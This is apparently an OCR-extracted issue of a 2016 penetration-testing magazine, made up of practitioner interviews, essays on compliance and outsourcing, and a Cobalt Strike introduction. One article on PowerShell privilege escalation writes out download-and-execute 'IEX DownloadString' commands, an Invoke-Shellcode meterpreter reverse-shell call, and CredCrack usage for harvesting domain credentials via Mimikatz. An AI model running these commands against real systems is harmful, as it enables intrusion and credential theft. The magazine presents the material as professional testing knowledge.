TRENDS IN 2016
source:i.stack.imgur.com
Whilst every eort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concering the results of content usage. All trade marks presented
in the magazine were used only for informative purposes.
All rights to trade marks presented in the magazine are reserved
by the companies which own them.
DISCLAIMER!
The techniques described in our articles may only be used in
private, local networks. The editors hold no responsibility for
misuse of the presented techniques or consequent data loss.
Contents
I think it is a great space to be in right now and for the future
interview with Kai Pfiester founder of Black Cipher Security
10
13
20
24
27
by Martin Brough
29
32
by Tom Updegrove
36
KAI PFIESTER
[PT]: And now, when you are working in the field, did reality meet the expectations?
[KP]: Reality has definitely met my expectations. I love my job and feel I have found what I was born
to do. I am a chess player and I love a good challenge that forces me to think outside the box.
Penetration testing and cyber security are, in my humble opinion, some of the most challenging fields to
work in, since they are so dynamic.
[PT]: What kind of challenges did you face while creating your company?
[KP]: There were, and still are, many challenges in starting my own company. For starters, I thought
I wouldnt have to really sell anything. With all the hacking and data breaches at the time, I sincerely
believed that other businesses would come running to me for help. However, that was not the case
as most business owners that I encountered didnt think they were even worth a hackers attention.
So the primary challenge for me to this day is getting business owners to realize the need for
an eective information security plan. The next big challenge for me was to deal with all the other
aspects of running your own business such as contracts, website design, marketing, business
development, partnerships, taxes, etc., that come with being an entrepreneur. I am a technical person
and so I had to learn all of the other stu as I went along.
[PT]: Your company provides services for small and medium companies. Do you find more firms
are becoming aware of cyber-attacks?
[KP]: Due to the media coverage, yes, more firms are becoming aware of the proliferation of cyberattacks. However, they tend to still think that it wont happen to them or that they havent been hacked
yet. However, most are not keeping and monitoring logs so unless there is some blatant evidence of
a breach, they have no way of knowing if theyve been compromised or not.
[PT]: What do you think are challenges for firms who are between small companies and major
corporations?
[KP]: In my opinion the major challenges they face are deciding whether they need to outsource their IT
security in order to keep costs down versus having their own in-house information security team. As we
all know, if you have data and / or resources worth the attackers attention, you will be targeted at some
point.
[PT]: From your own experience, do you prefer to work with smaller or bigger companies?
[KP]: I prefer to work with smaller companies as there is less bureaucracy and you can get to the heart
of the matter (securing their infrastructure) quickly.
[PT]: What are your general thoughts about development of cyber security market?
[KP]: I think it is a great space to be in right now and for the future. When you consider how IT
is interwoven into almost every aspect of a persons daily life, it is easy to see how crucial IT security
is and will be. From IoT to mobile apps to social media to corporate and government networks, the
cyber security market is going to thrive well into the future.
[PT]: As a person who knows penetration testing tools a lot, do you think there are going to be
any breakthrough changes in technology?
[KP]: Absolutely! I think it is only a matter of time before quantum computers will be able to crack RSA
encryption pretty quickly. Multi-factor authentication based on physical and / or behavioral traits seems
to be the best approach to truly securing things. For instance, the banking industry is seriously
considering using a persons heartbeat to authenticate before granting access to certain financial
services.
[PT]: There seems to be a very strong push to get rid of passwords and replace them with more
reliable solutions. What do you think about that? Is that a move in the right direction?
[KP]: I completely agree that we need to get rid of passwords once and for all as a form of single-factor
authentication. They can stick around if we use them only in multi-factor authentication scenarios. VCRs
and video tapes were great when they first came out. They served their purpose well. But then came
DVDs and now we are streaming video directly to our screens. Passwords are in the same boat. With
super-powerful GPU-based password cracking machines, freely available wordlists, rainbow tables, etc,
many common passwords can be cracked within a week to ten days. If passwords are accompanied by
some form of two-factor authentication the account they are protecting is pretty safe. But I imagine it
is only a matter of time before that obstacle is overcome.
[PT]: Can you tell us what is changing in terms of recruiting pen testers or cyber security
specialists? Do you find it's going to be harder to find a job in this area?
[KP]: I recently discovered a website called stealthworker.com that specializes in recruiting and stang
for cyber security. I imagine that there will be other sites like it and eventually there will be a clearing
house, so to speak, where you can find the talent that you are looking for. As for finding a job in this
area, no, I dont think it is going to be harder. You cannot go wrong by specializing in IT. You can almost
always find a job. As for the cyber security market, if you have the skills, there will always be work.
Especially in the government sector.
[PT]: Every day we can hear about new attacks. How do you see cyber threats evolving in the
near future?
[KP]: As cyber security product vendors make products better at detecting the subtlest attacks,
attackers will be forced to evolve their attacks as well as their skillset. The human factor is always going
to play a part since humans are the ones that can make the greatest security technology in the world
completely useless by not configuring it correctly or by being social-engineered to turn it o.
Leveraging Powershell in Windows is also a growing attack vector as it does not trip AV. So I imagine
using a systems tools against itself will also play a part in the types of attacks we see a lot of in the
future.
[PT]: Following previous question, do you find tools we have are good enough to ensure
complete protection of a company?
[KP]: The primary weaknesses in cyber security are threefold: humans, technology and processes. There
is great security awareness training available for people so that is covered. There is also highly-eective
data security technologies as well as policies that govern how IT equipment and data should
be handled. So what, then, is the problem? The problem is that rarely are all three of these factors
implemented together into a solid cyber security defense strategy. When they are, a data breach is
an extremely rare occurrence, if it ever is.
[PT]: Have you got any final thoughts about trends in penetration testing and vulnerability
analysis in 2016?
[KP]: As more and more people get into the field we are going to see some really cool tools
be developed. I also think we are going to see more frameworks like SET and Metasploit be released.
When parents have only one child, that child has no one to learn from. Most of his or her knowledge
comes from single-handed experience. But the next child born into the family not only learns from their
own experience, but learns from the other child as well. So the second childs skillset develops faster
than the first childs skillset. We have the same situation with pen testing and vulnerability analysis
as well. These fields are young and the elders have set the stage with all their hard work and
contributions. But I think the younger generation is going to improve and build upon the current
foundation and develop tools that will be super eective in bypassing todays defense technologies.
[PT]: Do you have any thoughts or experiences you would like to share with our audience? Any
good advice?
[KP]: Never be so arrogant that you think you are unhackable or not worth an attackers time
or attention. I once had a business lead at a certain company and after talking to the companys IT guy,
he basically told me that he had all the companys cyber security under control. At that point, I said OK
and let it be. Six weeks later I get a call from him. He was in panic mode because his network had been
hacked. They noticed more bandwidth than normal was being eaten up and tracked it to a specific
8
server. Upon further investigation it had been hacked and was turned into a spam server. After checking
the timestamps on certain files, it was determined that his network was hacked prior to, and during, the
time he told me that he had all the networks security under control and didnt need my help.
True security requires humility and constant vigilance.
source:hospitalitynet.org
One of the predictions in 2016 is that it will be a year of Hacking the Code. Not DaVinci Code,
computer code. This code contains vulnerabilities and its being exploited with underlying
integrations and connections to various enterprise-class systems.
The second prediction is that we will be seeing cybersecurity and incident response automation.
This relates to the notorious erroneous nature of human beings, despite genuine talent, that
creates this automation and digital world we know today.
10
positives. Tools provide learning capabilities are far away from the popular terms of machine learning
and intelligence, however.
As new tools and utilities are being introduced to help automate penetration testing tasks to such
a degree that would not have been possible just a few years ago, application complexity, technologies,
and trends evolve exponentially with them. Although automation continues to be essential for
pentesters, the challenges remain the same: every application is dierent, tools will heavily depend on
user direction, since they cannot understand the context and semantic meaning, have no intuition, and
cannot improvise nor adjust strategy.
Pentesting strategies are now converted from one shot a year exercise to annual programs, where
secure code review, static and dynamic, is combined with perhaps quarterly penetration test
of targeted areas. The financial sector, in particular, considers penetration testing as an annual product,
versus a one-time service. Professional firms use human intellect and tools to setup whole
cybersecurity code exploitations and development practices with emphasis on testing components.
Eective penetration testing teams will consist of 3-5 highly trained professionals and specialists,
executing the pentest assignment with well-rehearsed scrum ecacy, communication, division of tasks,
re-prioritizing backlog, tracking, addressing new issues, strategically re-focusing to maximize value
of both individual and the team contribution, committing and owning the project from start to
completion. Teams adapting lean methodologieswould typically achieve a velocity of at least double
of isolated individual contributors of same background
New skillsets will be required in various emerging areas of penetration testing:
Mobile Devices - iOS, Android, or Windows based native applications, as well as a hybrid application
assessment will become more and more important as the use of mobile devices will be gradually
shifting from entertainment to business use and processing financial and other sensitive data.
Cloud and virtualization - software-defined network technology is new and changing rapidly - also
changing is its threat landscape. This will require adjusting pentesting techniques with a matching
speed.
Internet of things, embedded systems, pentesting/reverse engineering - oce and home
automation, vehicles, medical, payment, industrial control systems, switches, power converters, circuit
breakers, and other devices are being connected to networks and therefore exposed to possible
attacks - they all will need new and improved tools and approaches.
Ever evolving modern JavaScript based web applications - to assess security of such applications
there will be a need to combine the classic crawling and scanning with a web browser engine,
JavaScript debugger, forward/backward tracer, unpacking/de-obfuscation snapshots comparer, a script
based state/variable alerting, injecting and fuzzing.
Wireless systems - Software-defined radio (SDR) based wireless security assessments, WiFi, smart
meters, wearable devices, etc. - all this will require specific tools and skillsets.
Machine learning - based anomalies detection will keep improving.Unfortunately, so do countermeasures.
11
Internal network pentesting - will be used more as companies realize that to penetrate their internal
networks using social engineering is a real possibility.
Social engineering - as a part of pentesting, in the foreseeable future, we don't see
a possibility that an automated robot can get to a company building and ask somebody to "print his
resume" from an USB drive.
Remanence of Zeitgeist-old era are **legacy systems** with a plethora of well-humming and rather
dated production deployment out there are great examples of pentester need. These systems will
continue to require pentesting, which will not deviate greatly from currently-proven methodologies, and
a skilled pentester is crucial for those precise military snipermissions.
We do believe that in the near future and beyond (at least until the time when applications are fully
developed and auto-improved by autonomous artificially intelligent agents), it will still be the human
genius and intelligence, in-depth understanding, and ecient utilization of automated tools, which will
determine the most successful pentesting outcomes. Terminator is an interesting concept and a movie,
only time will show how far an artificial intelligence will get and if the human genius will replace itself by
fully automated systems. Do not forget, in the present days, it is the human hacking skillset that so far
won the race against machines.
JARO NEMCOK
Web Security Researcher at LIFARS LLC, an international cyber security and
digital forensics firm. He started his career in software development with
focus on security and later moved to Information Security, focusing
on system audits, security/risk assessments, penetration testing, incident
response to hacked web applications, and overall security.
He has almost two decades of cybersecurity experience, including
vulnerability assessment, secure code review, cloud-based penetration
testing, digital risk assessment, digital evidence acquisition, investigation
of web attacks, security assessments of Internet-facing applications,
penetration tests across internal networks, development of testing scripts
and procedures, and digital forensics. Jaro worked on many high-profile
cases, including a much publicized Box.com and Dropbox leakage.
ONDREJ KREHEL
CEO and Founder of LIFARS LLC, an international cybersecurity and digital
forensics firm. With over two decades of experience in computer security and
forensics, he conducted a wide range of investigations, including data
breached through computer intrusions, theft of intellectual property, massive
deletions, defragmentation, file carvings, anti-money laundering, financial
fraud, mathematical modeling and computer hacking.
Ondrejs experience also includes advanced network penetration testing,
database security testing, physical security assessments, logical security
audits, wireless network penetration testing, and providing recommendations
for operational eciency of approaches. He is one of the few security experts
in the world holding the Certified Ethical Hacker Instructor Certification (CEI).
Ondrej worked on many high-profile cases, including a much publicized
12
Privilege escalationis a task that proves dicult at times. In the past, one would rely heavily
on metasploit as the full exploitation suite. With metasploit, one would not only be able to exploit
a vulnerability but quickly elevate privileges with thegetsystem command. However, with the
landscape of cybersecurity constantly changing, it was only a matter of time before network
administrators implemented new technological advancements that would detect and prevent
most metasploit payloads. With one of pentesters favorite tools now being detected, pentesters
needed to find an alternative solution.
Welcome to the new era of pentesting, an era where dropping binaries onto victim systems is no longer
required. An era where one can execute shellcode or obtain credentials in the clear without touching
the file system. Welcome to the era of pentesting with PowerShell.
This article aims to provide a technical introduction on how to use PowerShell to quickly escalate
privileges on Windows operating systems.
13
THE WORLD OF POWER SHELL
Since its release in November of 20061, PowerShell has facilitated the jobs of several Windows
administrators. With an array of methods and functionalities, PowerShell is much more powerful and
diverse than its predecessor, the command prompt.
However, despite PowerShells diverse
functionality, there is one method that catches the eyes of pentesters, the DownloadString method.
The DownloadString method is present in PowerShell version 2.0 and forward. When used,
DownloadStringdownloads the contents of a webpage into a string. If the string downloaded happens
to be a PowerShellscript then this can be executed. The best part? The execution would run
in memory, thus bypassing most security products and PowerShells script execution policy.
To demonstrate the DownloadString functionality, I created a simple PowerShell script named
ipconfig.ps1 and ran it on a fully patched Windows 10 operating system. The ipconfig.ps1 script
identifies the version of PowerShell running and runs ipconfig.
Table 1: Ipconfig.ps1 script contents
$ver = $PSVersionTable.PSVersion.Major
"You are using PowerShell version " + $ver
ipconfig
There is an error when the script is run locally since PowerShells execution policy is set to restricted.
This means that no PowerShell scripts can be run.
Figure 1: PowerShell execution error
However, if the script is uploaded to a webserver and DownloadString is used, PowerShells execution
policy is bypassed.
Table 2: Example of PowerShellsDownloadString functionality
PS >IEX (New-Object Net.WebClient).DownloadString(http://gojhonny.com/pentestmag/ipconfig.ps1)
14
Armed with this knowledge, pentesters started creating PowerShell scripts and combining them with
the DownloadString method to bypass security restrictions. Today, two of the most widely used scripts
are the Invoke-Shellcode and Invoke-MImikatz scripts. Both scripts may be found on
MattGraebersGithub2.
INVOKING SHELLCODE IN MEMORY
The Invoke-Shellcode script allows pentesters to execute custom shellcode or payloads like
metasploits reverse HTTP. The example below depicts the use of the DownloadString method to
bypass security restrictions and execute a reverse metasploit HTTP payload in memory. The InvokeShellcode script was placed on a local webserver with the IP of 192.168.146.132.
Table 3: Example of PowerShell DownloadString Invoke-Shellcode command
PS >IEX (New-Object Net.WebClient).DownloadString("http://<pentester_web_server>/InvokeShellcode.ps1")
PS >Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost<ip> -Lport<port>
After executing the script on the victim system, one should have obtained a shell as shown in Figure 3.
15
The ability to execute this script in memory is incredibly powerful for pentesters. Imagine recursively
obtaining the credentials of all systems in a domain. One would be able to obtain domain administrator
credentials in seconds and successfully escalate privileges. This is where CredCrack comes in.
AUTOMATING PRIVILEGE ESCALATION WITH CREDCRACK
Pentesters love automation, in fact we love automating as many things as possible. Thankfully, there
are tools that have been created to automate exploitation and privilege escalation and make the lives
of pentesters easier. With great tools, such as Empire, PowerUp and CredCrack, one may go from
domain user to domain administrator in seconds. The following section will demonstrate how to use
CredCrack, a popular credential harvesting script.
CredCrack was created and released by myself, Jonathan Broche, in August of 20153. Since then,
it has become a popular tool amongst pentesters and with the online community. CredCrack has two
main functionalities: share enumeration and credential harvesting.
Table 5: CredCrack's help menu
usage: credcrack.py [-h] -d DOMAIN -u USER [-f FILE] [-r RHOST] [-es]
[-l LHOST] [-t THREADS]
CredCrack - A stealthy credential harvester by Jonathan Broche (@g0jhonny)
optional arguments:
-h, --help
show this help message and exit
-f FILE, --file FILEFile containing IPs to harvest creds from. One IP per
line.
-r RHOST, --rhost RHOST
Remote host IP to harvest creds from.
-es, --enumshares Examine share access on the remote IP(s)
-l LHOST, --lhost LHOST
Local host IP to launch scans from.
-t THREADS, --threads THREADS
Number of threads (default: 10)
Required:
-d DOMAIN, --domain DOMAIN
Domain or Workstation
-u USER, --user USER Domain username
Examples:
./credcrack.py -d acme -u bob -f hosts -es
./credcrack.py -d acme -u bob -f hosts -l 192.168.1.102 -t 20
Once domain user credentials have been compromised, it is recommended to use CredCracks share
enumeration functionality to identify systems the compromised user has administrative access to.
16
The share enumeration functionality uses the SMB protocol to test shares for write access on the
systems provided.Systems that grant read/write access to its administrative share (C$) indicate that
the user has local administrative access.
Figure 6: Enumerating share access with CredCrack
After using the share enumeration functionality, the pentesterwould create a list of systems with
administrative access and feed them into CredCracks credential harvesting functionality.
CredCrackscredential harvesting works by executing the Invoke-Mimikatz script using
PowerShellsDownloadString method against the provided systems. Victims will execute InvokeMimikatz and send the credentials over an HTTP POST request back to the pentesters system.
Figure 7: Illustration of CredCrack sending Invoke-Mimikatz to victim systems
17
Once Mimikatz has been executed on the victim system through PowerShell, it will send the credentials
in a POST request to the pentester's system.
Figure 8: Illustration of CredCrack sending credentials in a POST request back to the pentester
After all victims have finished the execution of Mimikatz, CredCrackwill searchfor any matches against
the domain administrator's list to see if a domain administrator account was obtained and if so, output
the accounts credentials.
Figure 9: CredCrack output
18
Domain administrator in just 10.9 seconds!CredCrack has proven to be one of the fastest ways to
escalate privileges in large enterprise environments and is just one example of the several powerful
tools available for pentesters today.
CONCLUSION
There are several ways to escalate privileges on a network and the aforementioned tools are just
a handful of them. The cyber security landscape is always changing and there is always something to
be learned. Try the methodologies mentioned in upcoming pentests and do not be discouraged from
researching new methodologies and building the next best tool!
19
In regulated industries, it has become common practice for management to assume that
compliance and security are one and the same. They believe that because an auditor has marked
them as being compliant, there are no further actions that need to be taken to secure their
systems. The idea that because something is compliant, it must also be secure has become an
inside joke among security professionals; unfortunately, those same professionals are often
incapable of translating to management exactly why a compliant system is not necessarily
secure.
INTRODUCTION
In January of 2011, the United States Government Accountability Office (GAO) reported to Congress that
Utilities are focusing on regulatory compliance instead of comprehensive security and that security
requirements are inherently incomplete, and having a culture that views the security problem as being
solved once those requirements are met will leave an organization vulnerable to cyber-attack.It is not
only utilities that suffer from this problem; in the last 18 months, over 150 million credit cards numbers
and protected health records have been stolen from companies that had all been found compliant
in their most recent assessments. Companies like Target, JP Morgan, Home Depot, and Neiman Marcus
(to name only a few) have learned just how short of true security a compliant program can leave you.
In regulated industries, it has become common practice for management to assume that compliance and
security are one and the same. They believe that because an auditor has marked them as being
compliant, there are no further actions that need to be taken to secure their systems. The idea that
because something is compliant, it must also be secure has become an inside joke among security
professionals;unfortunately, those same professionals are often incapable of translating to management
exactly why a compliant system is not necessarily secure.
20
THE ROLE OF THE PENETRATION TESTER
Most experienced penetration testers know the feeling of arriving
on site to a new client and having the security administrators
almost beg to have their systems compromised. They are aware
of how vulnerable they are, but have been unable to secure the
budget to do anything about it. They believe that the only way
to do so is for the penetration test report to show management
exactly how secure their compliant system is. Oftentimes
throughout the drafting of the report, the security administrators
will request specific wording or recommendations that they
believe will help them convince their management team that
something more needs to be done.
It is no secret that many companies value third party input much
more highly than they do internal recommendations. A request
that has been made multiple times from a security teammay
sudden be fulfilled if it comes as a recommendation in a third
p a r t y r e p o r t .
As such, it is often the responsibility of the penetration tester
to identify the areas where management has been lax
in assigning resources and prioritize their recommendations
accordingly. If it is clear that large amounts of the security budget
is being directed towards a brand new Security Incident and
Event Manager (SIEM), but the security staff doesnt have the
knowledge or training to support that SIEM, it is important for the
penetration tester to recognize this and recommend training for
the security staff.
However, it is also important for the penetration tester to be
aware of and knowledgeable about the regulations with which
their client must comply.Writing a report that recommends
changes that fall far outside the scope of the clients compliance
needs is as likely to create meaningful change as not writing the
report at all. On the other hand, if the report can be aligned with
the clients compliance goals, it becomes far more likely that
management and the security team will utilize it to achieve not
only greater security, but also stronger compliance.
21
22
as complete or compelling as one written by a HIPAA expert--to say nothing of a penetration tester who
has no compliance knowledge at all. The ability to custom tailor report findings towards specific
compliance burdens will allow penetration testers to better serve their clients and help increase the
overall level of security from compliance-driven entities.
23
source:http://cdn.cfo.com
Many large organizations use a system integrator (SI) to provide their IT infrastructure and
associated services. There is also a growing trend to use multiple suppliers to deliver the holistic
service that was once provided by a single SI. In either case, using SI(s) can significantly impact
the efficacy of Penetration Testing unless the issues are recognized and managed early on by the
organization being tested.
Penetration testing is typically performed for a set number of reasons, often at pre-determined intervals
and for pre-determined in-scope systems. Other testing may occur ad-hoc as required after significant
changes to the environment.
Pre-determined testing is again sub-divided into evaluating security weaknesses with the intention
of maintaining a good level of protection, or as part of a regulatory requirement for annual testing such
as PCI. How effective the penetration testing is may be highly dependent on the type of engagement the
organization has with the SI and not necessarily the SI itself.
A good example here is based on our experiences of IBM, Fujitsu, CGI and others. The SIs themselves
all have the skills and capability to offer a highly effective all-round service delivering on the promises set
out when a contract is negotiated. However, depending on the contract negotiated, the organization will
receive different levels of service highly correlated to the value of the overall contract with the
SI (basically - you get what you pay for). So, while at a high level and on paper, services provided in the
bundle by the SI, like Penetration Testing, may look comprehensive and tick all the right boxes but
do they really deliver what the organization needs?
In our example above, the SI may deliver the regular penetration tests on time and per the pre-defined
scope, generally satisfying the term of the contract but not necessarily satisfying the need to effectively
secure the organization and to assure full compliance against any regulatory requirements. Gaps only
become apparent once the organization actually looks more deeply at the nature of the testing, how
it was initiated and performed.
24
It is important to regularly ask questions of the SI such as how deep was the testing and how was the
scope validated? When you look at the small print of what was actually agreed, you may find the level
of testing agreed to was actually only superficial and mostly automated scanning hardly real
penetration testing at all. This may be far below the actual capability of the SI, and maybe they did not
engage their top-tier testers or allow as much time as required to do a truly effective job at identifying the
more subtle issues. Unless the organization employs specialists who examine or validate the level
of testing, there may be an assumption that everything is fine as penetration testing is completed
regularly.
Scope is another important factor. The SI will typically be very good at keeping a complete and up
to date list of all the assets being managed, as that is effectively their only way of accurately calculating
the service costs, so it is in their interests to manage that list well. What the asset list does not do,
however, is keep a true track of what should be part of annual testing. From a PCI perspective, maybe
it is effective as long as the organization has kept the SI informed of which applications or data sets
may be considered as within a PCI scope. This is not always something that is as black and white as
it should be, for not all organizations have cleanly defined network scopes or security zones. For those
organizations where a PCI scope may bleed into other networks due to applications being connected to
the PCI zones, unless the SI and the organization are both synchronizing their view of PCI scope, things
may be lost in translation. This can leave some potentially valuable PCI targets out of scope for the
annual testing. The SI may continue to deliver per the contract and report all is well, and the organization
may assume all of PCI is being regularly tested as the loss of synchronization of asset details goes
unnoticed. It is not until there is a breach, or possibly worse still the PCI auditor questions why some
systems were missed out that the organization becomes aware of this situation. The same scenario
applies to critical systems which contain confidential data, etc. The organization must ensure the scope
the SI is working to is kept up to date so the right systems get tested, and it is not generally the
responsibility of the SI to pro-actively obtain this information.
Regulatory requirements are also evolving and generally this tends towards stricter security controls
which can result in additional complexity. Introducing a requirement to perform authenticated testing, for
example in PCI v3, creates a need to perform Penetration Testing in a very different way on some
systems. For applications that require authentication, it can be very difficult to obtain credentials for the
SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements
around who can get access or how the access must be provided. If this is a new requirement for which
the organization has never previously had to deal with, especially outside of its pre-production testing
networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this
will take time. The contract between the organization and the SI may simply not accommodate this at all,
but the time to find this out is not a few weeks before the regulatory audit is due!
When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and
the service is not generally questioned. Service reporting is often all green indicating all deliverables are
on track; afterall, thats what you pay an SI for to deliver the contracted service on time. You dont
generally get an independent attestation as to quality, or careful validation that it is meeting the real
security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is
incredibly important for the organization to either employ people with the necessary skills to validate the
25
quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration
Testing organization who can provide a baseline to identify service gaps.
If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize
the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially
PCI, may mean its time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track.
26
Pentesting is truly an art form that I have studied for most of my life, however, pentesting
is a dying art form that needs to be resuscitated! I dont mean that people are no longer using
them; in fact, its just the opposite.
I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice.
Within the past two years, I have noticed a significant increase in companies adding annual pentests
into their contracts with companies that handle their data. Companies that oer services such as SaaS,
cloud data storage, outsourced web development and media management are now all being required
by contract to participate in both annual audits of their systems and penetration tests to ensure their
data is secure. So what do I mean by Pentesting is a dying art form? I meant thatpentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know
what they are looking for and how to test your company's systems. It seems that every script-kiddie
with a Kali box these days will tell you they are a pentester! A true pentest cannot be done from a box
of automated tools; it involves a ton of research, analytics, scanning, probing, watching, social
engineering, oh and yeah exploitation! When I was growing up, if you wanted to learn to be
a pentester or how to find vulnerabilities in software or hardware, you needed to be a member of small
groups that did that as a hobby. Penetration testing used to be viewed as hacking and hackers have
always been close-knit groups that dont share a lot unless you are vetted. Online video resources, like
YouTube, I feel have changed that a lot. If you want to know what command to run in Nikto
or Nmap,then just Google it and find a tutorial that some other teenager posted after watching another
teenager do it. I am excited to see the direction that pentesing is taking as far as beingaccepted on
a corporate level because it says to me, that people are starting to care about their data and what its
doing.
I think its really important to convey a few key points about penetration tests; 1. A pentest does not
make your company un-hackable. The main objective of a well-done pentest is to reduce your attack
surface. Your goal as a company should be to allow the specialized team conducting the pentest,
to treat your network as though they were a real attacker trying to get in. You want to find as many
holes in your network as you can and close them. 2. Put as few restrictions on the pentesters
as possible. A recent trend I have noticed in the past year has been companies that are contractually
27
obligated to have these tests done but see them as a burden and dramatically limit the network
exposure that theteams are allowed to have. This makes the results of your pentest borderline useless.
One example I have seen of this is when told I can give them a report of my web application scans but
under no circumstances am I to exploit any vulnerability found. Exploitation not only helps to find the
directions of traversal after gaining access but also tests any scanners, firewalls and loggers that are
in place to see if they are configured to pick up on these kinds of events, so it is very important to allow
the pentesters to run a full pentest against your defenses. And finally number 3. After all is said and
done, your pentest is complete and your attack surface reduced and you have your certificate in hand,
spend the next 364 days maintaining the hard work you just put in. Patch your systems, check your
logs, and always verify your code.
So what does all this mean for the future of pentesting? I believe that we will continue to see a massive
increase in the requirement to have not only annual but semiannual pentests conducted for high profile
companies especially. I strongly feel that C-Level personnel in these enterprises are starting to see not
just the compliance value but also the security value to having proper pentests conducted. Executives
are able to see firsthand more and more in the news just how important it is to maintain a secure
environment for your companys data. Of course, with the increase in demand for pentesting, there
in turn is an increase in those oering pentest services. Make sure you do your homework on who you
sign to conduct your pentest. That person, whom you give access to your network, can do a lot
of damage if they are guessing their way through! If you see your pentester sitting in your oce
watching a YouTube video on how to use msfconsole, you need to dismiss them as soon as you can.
There are plenty of reputable companies out there, you just need to find one that meets your
company's needs as well as fits your companys financial situation.
28
MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin
was already regularly teaching Penetration Testing Training
Courses, Cisco authorized Security Courses and was regularly
engaged by governments and other businesses to establish
Security policies, perform Ethical Hacking and Penetration Tests
in order to secure network infrastructures and to remediate the
threats encountered.
[PM]: Your firm provides services for companies from dierent sectors like card industry,
healthcare, manufacturing or educational. Do you find more sectors become aware of cyber
attacks?
[MV]: Security awareness has certainly reached board level. Many clients we have still dont believe they
could be targeted, but use our services regardless because they are bound to government and industry
regulations such as PCI, HIPAA, ISO 27001 etc.
29
[PM]: What is the major diculty in working with such dierent companies and sectors?
[MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with customer.
In some occasions, especially in larger companies, internal engineers become very defensive when
being confronted with results. However, its not our aim to finger point. We merely uncover holes and
help customers becoming more secure. On other occasions, the more we find, the more it is
appreciated. Another big challenge is governmental work as it often requires very specific skills and
certifications but the consultant holds a wrong passport. This can be very frustrating at times as, for
example, only a UK citizen is allowed to perform the work for a UK government client.
[PM]: From your own experience, do you prefer to work with smaller or bigger companies?
[MV]: We prefer mid size to large size.
[PM]: I can see your company provides great initiative: free educational sessions for children.
Can you tell us more about this idea?
[MV]: Those are little awareness workshops for children at schools. We started that program in Mexico
where one of our oces is. We teach children how to stay safe when using laptops, smartphones, pads,
social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable
for kids.
[PM]: What are your general thoughts about development of cyber security market?
[MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social
Engineering), Web Applications, Mobile Apps and Wireless.
[PM]: As a person who knows penetration testing tools a lot, do you think there are going to be
any breakthrough changes in technology?
[MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications
will become more sophisticated and need more testing and the mobile market brings its own new
challenges in Wireless and Apps.
[PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security
specialists? Do you find it's going to be harder to find a job in this area?
[MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile,
Colombia and Panama). We also engage in the UK market but very little in other countries. For us the
30
biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and
employers in the US actually often struggle to find the right skills available.
The top 3 criteria :
- OSPC certified or better (OSCE etc.) The Oensive Security Certifications are the best ones in the
market and we hire OSCPs over CEH, because the OSCP is a hands on and very challenging exam.
Someone who passed that exam is a real pentester who also can do reporting
- Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the
guys outside the US dont come with great English language skills.
- Integrity, working to timelines and reliability.
[PM]: Everyday we can hear about new attacks. How do you see cyber threats evolving in the
near future?
[MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime
and away from individual guys. Some of the attacks we have seen at customers require teams of highly
skilled experts and tools and a lot of the underworld has created and is creating task forces for certain
jobs. A lot more challenging to tackle than the lone hacker or script kiddie.
[PM]: Have you got any final thoughts about trends in penetration testing and vulnerability
analysis in 2016?
[MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin
American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting.
Also a lot of companies start realizing that technical defense isnt everything and that social engineering
makes up a lot of the breaches. User education and enforcement of policies will become a much bigger
part.
[PM]: Do you have any thoughts or experiences you would like to share with our audience? Any
good advice?
[MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web
App) is not good enough anymore these days. Pentesting should include mobile App, Wireless,
Bluetooth and Social Engineering.
For aspiring pentesters and existing pentesters, do the Oensive Security Certified Professional (OSCP)
certification. Its very well recognized in the industry and weeds out the theory from the hands on folks.
31
I started to write this article about one of my favorite security tools Cobalt Strike but
as I delved into the history and thinking behind Cobalt Strike I realized that a better story lies
beneath the surface. The real story is about Pentesting and Adversarial Role Playing, which
is thought to be the next stage of Digital Security. Theres a whole new breed of White Hat
Hackers and they belong to Threat Actors. Theres a whole new breed of White Hat Hackers and
they are called Threat Actors.
32
a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling
peer-to-peer Beacons over Windows named pipes (Cobalt Strike website). Another aspect of Cobalt
Strike is its social engineering features which allows the Actorto get a foothold, covert command and
control with Beacon, browser pivoting, and reporting to Armitage's existing exploitation and team
collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the
Metasploit exploit and post exploit capabilities. Beacon facilitates the running of Power Shell scripts
over its connection; Python or Java for example. There is even an email phishing module that reports
when your recipients open the Phishing email you sent them.
COBALT STRIKE 3.0
As of October 2015, Cobalt Strike 3.0 does not share code with Armitage or depend on the Metasploit
Framework. It's the first version of Cobalt Strike to not depend on the Metasploit Framework. The tool
is geared towards red team operations and adversary simulation services. Although it does not depend
on the Metasploit Framework you can still run Metasploit elements.
Through one Metasploit instance, your team will:
Use the same sessions
Share hosts, captured data, and downloaded files
Communicate through a shared event log.
Run bots to automate red team tasks.
Since October 2015, Cobalt Strike 3.0 has been available via the website. You can download a trial
version at https://www.cobaltstrike.com/trial . You can also download its sibling (Armitage) free
of charge athttp://www.fastandeasyhacking.com/download
RED TEAMS
According to Wikipedia A red team is an independent group that challenges an organization
to improve its eectiveness. The United States intelligence community (military and civilian) has red
